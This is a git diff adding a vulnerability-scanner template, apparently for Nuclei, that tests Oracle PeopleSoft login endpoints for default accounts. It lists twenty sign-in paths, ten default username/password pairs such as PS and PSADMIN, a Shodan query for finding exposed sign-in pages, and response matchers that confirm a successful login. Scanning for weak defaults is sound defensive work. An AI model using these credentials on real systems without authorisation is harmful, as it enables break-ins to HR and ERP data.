diff --git a/default-logins/oracle/peoplesoft-default-login.yaml b/default-logins/oracle/peoplesoft-default-login.yaml new file mode 100644 index 0000000000..7542ab1189 --- /dev/null +++ b/default-logins/oracle/peoplesoft-default-login.yaml @@ -0,0 +1,83 @@ +id: peoplesoft-default-login + +info: + name: Oracle PeopleSoft Default Login + author: LogicalHunter + severity: high + description: Oracle peoplesoft default admin credentials were discovered. + reference: + - https://www.oracle.com/applications/peoplesoft/ + - https://erpscan.io/press-center/blog/peoplesoft-default-accounts/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: title:"Oracle PeopleSoft Sign-in" + tags: default-login,peoplesoft,oracle,fuzz + +requests: + - method: POST + path: + - "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG" + - "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG" + + body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG" + headers: + Content-Type: application/x-www-form-urlencoded + + attack: pitchfork + payloads: + username: + - PS + - VP1 + - PSADMIN + - PSEM + - PSHC + - PSCR + - HFG + - PSPY + - HHR_JPM + - HHR_CMP + password: + - PS + - VP1 + - PSADMIN + - PSEM + - PSHC + - PSCR + - HFG + - PSPY + - HHR_JPM + - HHR_CMP + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: PS_TOKEN=' + + - type: status + status: + - 302